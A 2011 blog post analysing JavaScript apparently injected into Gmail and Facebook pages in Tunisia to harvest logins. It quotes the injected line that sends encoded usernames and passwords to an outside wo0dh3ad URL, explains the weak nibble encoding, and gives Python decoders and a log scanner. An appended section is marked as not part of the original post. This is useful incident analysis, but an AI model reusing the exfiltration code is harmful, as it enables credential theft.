Friday, January 14, 2011

Tunisia haxors...

Some people have been talking about the JavaScript code injected in Tunisia when you try to access websites like Gmail, Facebook... They say the credentials are sent in clear text in the evil wo0dh3ad URL, but that is not entirely true: there is a very light encoding, as we can see in this snippet.

var url = "www.fessebook.com/wo0dh3ad?q="+r5t(5)+"&u="+h6h(us3r)+"&p="+h6h(pa55);

us3r and pa55 are encoded using the h6h() function, which is:


function h6h(st)
{
    var st2 = "";                      // accumulator; its initialisation is missing from the captured snippet, assumed to be "" (the test below only works with that)
    for (var i = 0; i < st.length; i++) {
        var c = st.charCodeAt(i);      // code of the current character
        var ch = (c & 0xF0) >> 4;      // high nibble (0..15)
        var cl = c & 0x0F;             // low nibble (0..15)
        // each nibble becomes one letter 'a'..'p' (97 = 'a')
        st2 = st2 + String.fromCharCode(ch + 97) + String.fromCharCode(cl + 97);
    }
    return st2;
}


It just loops through the string and splits each 8-bit character into two 4-bit numbers. Then it creates two new characters (chr()) by adding 97 (ord('a')) to each number and appends them to the encoded string, which is returned and inserted in the URL. So every byte becomes two letters in the range 'a'..'p'. A bit lame, isn't it? :-)

To decode us3r and pa55 from your logs, you can use this silly (no bounds checking) Python script:


[clem1@blah ~]$ cat unh6h.py
import sys

def unh6h(string):
    # each pair of letters 'a'..'p' encodes one byte: high nibble first, then low nibble
    u = ""
    for i in range(0, len(string), 2):
        s = ord(string[i]) - 97        # high nibble
        s <<= 4
        s += ord(string[i + 1]) - 97   # low nibble
        u += chr(s)
    return u

print(unh6h(sys.argv[1]))


A quick test:


>>> h6h("password")
"hagbhdhdhhgphcge"
[clem1@blah ~]$ python unh6h.py "hagbhdhdhhgphcge"
password
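As an added example that is not part of the original post, here is a bounds-checked version of the encoder and decoder together with a small helper that pulls the u= and p= parameters out of a wo0dh3ad URL found in a proxy or web-server log line, which is what you need when going through your logs to find which accounts were captured. The sample log lines are constructed for the example, the regular expression and the function names are assumptions of this example, and the host name only follows the snippet quoted above.

```python
import re
from urllib.parse import parse_qs, urlsplit

# nibble 0..15 -> letter 'a'..'p'; anything else cannot be h6h output
H6H_ALPHABET = "abcdefghijklmnop"


def h6h(text: str) -> str:
    """Python re-implementation of the injected h6h(): each byte -> two letters."""
    out = []
    for ch in text:
        code = ord(ch) & 0xFF          # the JS masks with 0xF0 / 0x0F, so only the low byte matters
        out.append(chr((code >> 4) + 97))   # high nibble
        out.append(chr((code & 0x0F) + 97))  # low nibble
    return "".join(out)


def unh6h(encoded: str) -> str:
    """Inverse of h6h() with bounds checking: odd length or letters outside a..p are rejected."""
    if len(encoded) % 2:
        raise ValueError("h6h output always has an even length")
    out = bytearray()
    for hi, lo in zip(encoded[0::2], encoded[1::2]):
        if hi not in H6H_ALPHABET or lo not in H6H_ALPHABET:
            raise ValueError(f"not h6h data: {hi!r}{lo!r}")
        out.append(((ord(hi) - 97) << 4) | (ord(lo) - 97))
    return out.decode("latin-1")


# Hypothetical pattern for the exfiltration URL quoted in the post: anything up to /wo0dh3ad?...
WO0DH3AD_RE = re.compile(r"https?://[^\s\"]*?/wo0dh3ad\?[^\s\"]*")


def extract_credentials(log_line: str):
    """Return (user, password) decoded from a wo0dh3ad URL in a log line, or None."""
    match = WO0DH3AD_RE.search(log_line)
    if not match:
        return None
    params = parse_qs(urlsplit(match.group(0)).query)
    try:
        return unh6h(params["u"][0]), unh6h(params["p"][0])
    except (KeyError, IndexError, ValueError):
        return None   # URL present but not a well-formed h6h payload


def scan_log(lines):
    """Yield (line_number, user, password) for every line carrying a decodable wo0dh3ad URL."""
    for number, line in enumerate(lines, start=1):
        creds = extract_credentials(line)
        if creds is not None:
            yield number, creds[0], creds[1]


# Constructed sample log lines (Apache/Squid style), not captured traffic.
SAMPLE_LOG = [
    '10.0.0.7 - - [07/Jan/2011:10:12:03 +0100] "GET http://www.fessebook.com/wo0dh3ad'
    '?q=kfjqw&u=gbgmgjgdgf&p=hagbhdhdhhgphcge HTTP/1.1" 200 43',
    '10.0.0.9 - - [07/Jan/2011:10:12:05 +0100] "GET http://www.example.com/index.html HTTP/1.1" 200 1210',
]

if __name__ == "__main__":
    for number, user, password in scan_log(SAMPLE_LOG):
        print(f"line {number}: user={user} password={password}")
```

Because the alphabet is only sixteen letters and the length is always even, a stricter check (`unh6h` raising on bad input) also tells you when a log entry is not really an h6h payload, which avoids decoding random query strings into garbage.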

1 Comments:

Blogger Unknown said...

It's funny, I don't think they're the only ones harvesting their citizens' IDs, but their way of doing it is a bit... dirty :D
Hope things are going well billou, bye!

2:49 PM  
